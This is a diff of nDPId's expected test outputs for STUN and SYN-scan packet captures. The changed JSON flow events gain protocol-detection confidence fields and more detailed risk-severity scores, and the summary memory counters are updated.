+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1636901936070,"flow_last_seen":1636901940923,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":77,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1636901998644,"flow_last_seen":1636902021381,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":1768,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
 00164{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","total-events-serialized":141}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 460/460
@@ -147,10 +147,10 @@
 ~~ total active/idle flows...: 23/23
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4643817 bytes
-~~ total memory freed........: 4643817 bytes
-~~ total allocations/frees...: 100083/100083
+~~ total memory allocated....: 4721218 bytes
+~~ total memory freed........: 4721218 bytes
+~~ total allocations/frees...: 101673/101673
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 169 chars
-~~ json string max len.......: 736 chars
-~~ json string avg len.......: 522 chars
+~~ json string max len.......: 845 chars
+~~ json string avg len.......: 576 chars
diff --git a/test/results/synscan.pcap.out b/test/results/synscan.pcap.out
index 77390cb25..02986fd53 100644
--- a/test/results/synscan.pcap.out
+++ b/test/results/synscan.pcap.out
@@ -1498,7 +1498,7 @@
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"synscan.pcap","alias":"nDPId-test","flow_id":744,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsJgwAACcG+2asEAAIQA2GNIzSBDDdUoMYAAAAAGACEAAkXwAAAgQFtA=="}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAs964AACcGKcSsEAAIQA2GNIzSE4ndUoMYAAAAAGACEAAVBgAAAgQFtA=="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","ndpi": {"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8181,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsirUAADEGjL2sEAAIQA2GNIzSH\/XdUoMYAAAAAGACCAAQmgAAAgQFtA=="}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"synscan.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -1629,7 +1629,7 @@
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":818,"source":"synscan.pcap","alias":"nDPId-test","flow_id":809,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsv5EAACoGXuGsEAAIQA2GNIzTH\/XdU4MZAAAAAGACDAAMlwAAAgQFtA=="}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsciYAADQGokysEAAIQA2GNIzTE4ndU4MZAAAAAGACBAAhAwAAAgQFtA=="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","ndpi": {"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1072,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAs7U0AACoGMSWsEAAIQA2GNIzTBDDdU4MZAAAAAGACDAAoXAAAAgQFtA=="}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":821,"source":"synscan.pcap","alias":"nDPId-test","flow_id":812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -4000,11 +4000,11 @@
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2004,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsALEAADsGDMKsEAAIQA2GNIzTE4rdU4MZAAAAAGACEAAVAgAAAgQFtA=="}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2005,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2005,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1994,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAs5sAAACYGO7KsEAAIQA2GNIzTE4bdU4MZAAAAAGACDAAZBgAAAgQFtA=="}
-00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30":"Desktop\/File Sharing Session"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}}
+00776{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"1":"Match by port"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3390,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3390,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30":"Desktop\/File Sharing Session"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}}
+00776{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"1":"Match by port"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9535,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9535,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -4024,11 +4024,11 @@
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1057,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19780,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1352,"l4_proto":"tcp","ndpi": {"proto":"LotusNotes","breed":"Acceptable","category":"Collaborative"}}
+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1352,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LotusNotes","breed":"Acceptable","category":"Collaborative"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7496,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7496,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1352,"l4_proto":"tcp","ndpi": {"proto":"LotusNotes","breed":"Acceptable","category":"Collaborative"}}
+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1352,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LotusNotes","breed":"Acceptable","category":"Collaborative"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7496,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7496,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -4092,19 +4092,19 @@
